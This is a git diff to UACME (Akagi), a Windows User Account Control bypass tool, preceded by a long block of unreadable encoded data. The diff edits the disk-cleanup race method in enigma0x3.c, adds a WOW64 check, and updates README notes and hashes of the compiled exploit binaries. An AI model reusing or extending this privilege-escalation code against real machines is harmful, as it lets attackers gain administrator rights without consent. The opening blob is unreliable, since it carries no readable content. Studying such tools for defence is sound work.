zWU&)Q%0IAMCgjP-+4B?fk{-m`sA?KXBI9|*ymA4F9t?@bB(a#ng0P4rwy5wGc{=Mn zaa7k-7|eB^foriXZ?cgGscgl>Zery}>v71EZA%Pg#VdD{WrhHxxleWzYd z+*N`>(@r|i2j2_nkG;ZI?^vkkqpknIvZnQrXR(>n61*96Ld(2OA0`;-{ia~t_%fH= zk`)5(13>%4eo7)3!6GBW99aqwq+b&fj}9UU0gVO3GjJ>aXe*}eXV_{noU>X%!<)>Q zmXN?^->he=(35_Xo=a@h^eO2n2uv>47IE`*p4VdqrwQT!`6rP`0sUMYa{DSfF+J5= zg&SWJzLY8-5-|eASOhbuN$;?S_w{bHh4dINamYjLW5AwD1ae6EmPbfjK|dEvV`$9_ z+CL(oG!9|@>2DHX4k&N)%NZfhvZ|s-Y-bTzL)qL@bldCRfPtQ~a-v?T3NEo0Tf4;pJ&r?GwfE>M^Pz_})Nd98&H20umch)p> za#-tbEPIx%?dzNm_m|t*ZL^m4I@C=hrzc+3HrUsrKl`L|>PZvl6A&ip!^H~*b}7QN zPd$=%`f6~+&U1_pw93Vy1pHZ?znQj`ee^a(JE}X_*5YKjmc3IvO3r62PqQEf-i2OJ2PcY^7!R2?yk*-v)IblP?pjw?T_&DC-SQD zkZsmMvEvxZXwKS7uucrJ;==`HN9Cbj*q=(7e@;R7Pr>J_Ta~D4Q@_UC?t)hX^rHtu zF?D4>&B=*NnMwln7!rkS1SS+w24_&XT6JNQZprL_4M$4js4EN;(X#F=41z%c15IX! z?tKumbm1EaFgU)tbGXc@$ylBPR>`ReXz z<*aK;<8Mr9-&T4D2fKvWZ{@2IE}e#w$%^OoslIPs7dh%gA>!icfysA>Jw3lOKFrk2 zcggFjugp)Av6ZAQ95-p(LxwR*+fZ@$a=ao8|G@aB4g_5c>+zhz6SYE;taxmA9C(fb zD?zyoPc!Iplq#N0c=qD?clFVQljX3;g6g=%fiQgDesRe{`OoU;+kTW;oos!rG{>G4 z`jw^`?!{tcSM9{J2^C%!zu;_N{q$`EMbYI2eOX8dxkziCEl;zPEb+mih9H zroYPI-b%QI$5B0a+kj5qc&tH=UARS}Y;QwYL0eJIPCySpm!MpP-E9@ueUKz|*^T>9DTp;`P>2R9 zccn{GHt6S2_IF8AF=z+MS4Kby=)EYP&y}PtpkG4y?Py7Q9rQ(%>0=Oj&>1L)6-d$- zps6fC)-{7JMENG3i09xq%Dbm}(OXouOa*|)Mhz%4r{Ss#dKk*pc+x4J8kToj~BQ96q-?%+v7nLY#21f7BMshQ{u=p9}Vug($;ucK^(!K*?; z1jjNp*yy{BW)$eGK|I${F*q_ku1)S-$|`eIDUOIcSk2bpoA+@=H8@ zL4S?%?!~}BuR?hRk5@(IDhT%yNtyyW2W9kaND#k!4yhybPn{_C>7-D zRnQKUQ}9SHAWA4#;fVlUjuSK{uiV_InDq8 diff --git a/README.md b/README.md index 403fec7..8d7136d 100644 --- a/README.md +++ b/README.md @@ -60,7 +60,7 @@ Run examples: * This tool is not intended for AV tests and not tested to work in aggressive AV environment, if you still plan to use it with installed bloatware AV soft - you use it at your own risk; * Some AV may flag this tool as HackTool, MSE/WinDefender constantly marks it as malware, nope; * If you run this program on real computer remember to remove all program leftovers after usage, for more info about files it drops to system folders see source code; -* Since 2.4 all added methods/code will be strictly x64. I don't see any sense in supporting 32 bit versions of Windows in 2016 year. +* Since 2.4 all added methods/code will be strictly x64. I don't see any sense in supporting 32 bit versions of Windows. # Microsoft countermeasures Methods fixed: @@ -103,8 +103,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105 # VirusTotal reference report -* Akagi32 https://www.virustotal.com/en/file/8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b/analysis/ -* Akagi64 https://www.virustotal.com/en/file/5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333/analysis/ +* Akagi32 https://www.virustotal.com/en/file/bc76b81567cdf3ead8e57164d466212849c4965fa6fa832ed10e5bb571e8d58b/analysis/ +* Akagi64 https://www.virustotal.com/en/file/6eb88048b0b9a0e195a8cfe4b9832761f76cab238f6bf62c5c6ac3a3c27fcf3c/analysis/ # Build diff --git a/Source/Akagi/enigma0x3.c b/Source/Akagi/enigma0x3.c index e41ffb8..9f4a92a 100644 --- a/Source/Akagi/enigma0x3.c +++ b/Source/Akagi/enigma0x3.c @@ -164,11 +164,13 @@ DWORD ucmDiskCleanupWorkerThread( do { status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL, - &IoStatusBlock, Buffer, (ULONG)sz, FILE_NOTIFY_CHANGE_DIR_NAME | FILE_NOTIFY_CHANGE_FILE_NAME, TRUE); + &IoStatusBlock, Buffer, (ULONG)sz, FILE_NOTIFY_CHANGE_FILE_NAME, TRUE); if (status == STATUS_PENDING) NtWaitForSingleObject(hEvent, TRUE, NULL); + NtSetEvent(hEvent, NULL); + pInfo = (FILE_NOTIFY_INFORMATION*)Buffer; for (;;) { @@ -204,8 +206,6 @@ DWORD ucmDiskCleanupWorkerThread( pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset); if (pInfo->NextEntryOffset == 0) break; - - NtSetEvent(hEvent, NULL); } } while (NT_SUCCESS(status)); diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index cf985ac..8c2fddf 100644 --- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -532,6 +532,11 @@ UINT ucmMain() return ERROR_UNSUPPORTED_TYPE; } #endif + //ban usage under wow64 (dismhost is x64 and x64 dlls are not present in 32bit version of this tool). + if (g_ctx.IsWow64) { + ucmShowMessage(WOW64STRING); + return ERROR_UNSUPPORTED_TYPE; + } break; } @@ -547,8 +552,7 @@ UINT ucmMain() { supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR)); } - } - + } //check environment and execute method if it met requirements switch (g_ctx.Method) { diff --git a/UACME.sha256 b/UACME.sha256 index 4244c48..7a4fac2 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -1,5 +1,5 @@ -8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b *Compiled\Akagi32.exe -5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333 *Compiled\Akagi64.exe +bc76b81567cdf3ead8e57164d466212849c4965fa6fa832ed10e5bb571e8d58b *Compiled\Akagi32.exe +6eb88048b0b9a0e195a8cfe4b9832761f76cab238f6bf62c5c6ac3a3c27fcf3c *Compiled\Akagi64.exe 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest @@ -15,14 +15,14 @@ ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\c fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h 6371bbc89d908cef5ee47fc436227cfa8f7d2dd026436832fb23fcde6eb18a17 *Source\Akagi\consts.h -bb21e48947918f6c73659f2987fbb59740e341beee1266973bb12786eefa6b16 *Source\Akagi\enigma0x3.c +e8d614e8bb275daebfe3e6407c1dd4e2be1541113ebac04e7fe0ee8dba227544 *Source\Akagi\enigma0x3.c 362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h 069d647a1453a78d20c8ae7f0d0b45554a0df26bdb4b4df3ba6ec964cc0b5df3 *Source\Akagi\global.h 5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h 8761ed178e2a91e89bc1421a903f82f10364bbb598fa519178a4f324b6b97f65 *Source\Akagi\hybrids.c 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h -4999f2124a97ddd4bd4535a4bf8367b38c381c8452b7bb51a7465eb7ce676697 *Source\Akagi\main.c +5859f19397408a1eef01c0a2debee43b0f0906064b7cc40c7bc0761691259d90 *Source\Akagi\main.c dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h